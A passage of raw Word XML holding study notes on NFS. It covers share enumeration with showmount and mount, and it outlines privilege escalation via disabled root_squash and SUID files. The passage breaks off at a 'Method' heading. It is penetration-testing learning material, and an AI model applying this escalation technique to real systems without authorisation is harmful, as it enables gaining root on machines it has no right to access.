        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">To access using NFS </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> RPC call is placed to NFSD (NFS daemon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F139199" w14:textId="585739B4" w:rsidR="00114DAB" w:rsidRPr="0084205E" w:rsidRDefault="00114DAB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Takes parameters such as file handle, name of file, user ID, group ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254D87B5" w14:textId="5E6E1EAB" w:rsidR="00114DAB" w:rsidRPr="0084205E" w:rsidRDefault="00114DAB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>What runs NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169B49E2" w14:textId="4C68D680" w:rsidR="00114DAB" w:rsidRPr="0084205E" w:rsidRDefault="00114DAB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NFS protocol, transfer files between OS types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9D519" w14:textId="07C1D01D" w:rsidR="00114DAB" w:rsidRPr="0084205E" w:rsidRDefault="00114DAB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>4.2 version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315993FF" w14:textId="2342431C" w:rsidR="00114DAB" w:rsidRPr="0084205E" w:rsidRDefault="00114DAB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerating NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40155393" w14:textId="270A0ED5" w:rsidR="00114DAB" w:rsidRPr="0084205E" w:rsidRDefault="00114DAB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Critical </w:t>
      </w:r>
      <w:r w:rsidR="00947593" w:rsidRPr="0084205E">
        <w:t>when considering how to enumerate and exploit a remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E7BD06" w14:textId="1F1622F9" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>For advanced enumeration of NFS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F486B6C" w14:textId="040820BF" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NFS-Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DCFDCD" w14:textId="589756E4" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Essential to have package installed on any machine that uses NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ED3DA6" w14:textId="59331375" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Contains </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>showmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mount.nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="177E4E84" w14:textId="248EA9AB" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Most useful for extracting information from NFS shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100FD7FF" w14:textId="34E01DCB" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Sudo apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E3CA9E" w14:textId="5106332E" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Port scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E657D4" w14:textId="5E1CC297" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mounting NFS shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1062076E" w14:textId="085F6C49" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client system needs directory where all the content shared by the host server in the export folder can be accessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC9DA3A" w14:textId="69D1093A" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Created anywhere on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135BE9B0" w14:textId="2A4243C4" w:rsidR="0063708F" w:rsidRPr="0084205E" w:rsidRDefault="0063708F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/mount (for temporary that will delete upon shutdown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294480E5" w14:textId="37A160CB" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Once created, use “mount” command to connect the NFS share to the mount point on machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450B16D3" w14:textId="19911177" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. Sudo mount -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;:share</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/mount/ -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nolock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D57B16F" w14:textId="1A7D2EE0" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sudo – root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F093CB" w14:textId="5CEC2FF2" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="00947593" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mount – execute mount command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF84009" w14:textId="5FC1BEE6" w:rsidR="00947593" w:rsidRPr="0084205E" w:rsidRDefault="000556E9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">-t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – type of device to mount, then specifying its NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C56DCD" w14:textId="0F533BEB" w:rsidR="000556E9" w:rsidRPr="0084205E" w:rsidRDefault="000556E9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;:share</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – the IP address of the NFS server and the name of the share we wish to mount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E63AB" w14:textId="3B177458" w:rsidR="000556E9" w:rsidRPr="0084205E" w:rsidRDefault="000556E9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nolock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – specifies not to use NLM locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD7324F" w14:textId="579635BC" w:rsidR="00CD2697" w:rsidRPr="0084205E" w:rsidRDefault="00CD2697" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>showmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -e &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389845F0" w14:textId="7C9F4FB2" w:rsidR="00CD2697" w:rsidRPr="0084205E" w:rsidRDefault="00CD2697" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Lists NFS shares that are visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C14CD7" w14:textId="4E049ADE" w:rsidR="00CD2697" w:rsidRPr="0084205E" w:rsidRDefault="00CD2697" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">After using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to confirm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B61A61" w14:textId="4765A3D3" w:rsidR="00032F61" w:rsidRPr="0084205E" w:rsidRDefault="00032F61" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use this in the “share” portion in the sudo mount command above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214AABD2" w14:textId="5209DDCB" w:rsidR="00032F61" w:rsidRPr="0084205E" w:rsidRDefault="00032F61" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Refresh directory by going back to home directory (or directory listed in NSF share) and reentering PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8EA24A" w14:textId="72E84EB7" w:rsidR="00032F61" w:rsidRPr="0084205E" w:rsidRDefault="00032F61" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploiting NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5520B14C" w14:textId="79011765" w:rsidR="00032F61" w:rsidRPr="0084205E" w:rsidRDefault="00446550" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">If a low privilege shell is on a machine with NFS share, </w:t>
      </w:r>
      <w:r w:rsidR="00FB2FC6" w:rsidRPr="0084205E">
        <w:t>it can potentially be used to escalate privileges – depending on configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EB79D9" w14:textId="01AFDD24" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Root_squash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52C364A0" w14:textId="757DA189" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enabled by default – prevents anyone connecting to NFS share from having root access to the NFS volume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAAF83B" w14:textId="6F299501" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Remote root users are assigned a user “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nsfnobody</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” – least local privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294630B7" w14:textId="026C2829" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If turned off, allows creation of SUID bit files, allowing remote root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4D6A31" w14:textId="606A6A36" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D79830A" w14:textId="1199AD75" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Files with SUID bit set can be run with the permissions of the file owner/group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA02384" w14:textId="36A4F01B" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Super-user – leverage to get shell with these privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C157F" w14:textId="144CD42E" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6274A63A" w14:textId="125859F7" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
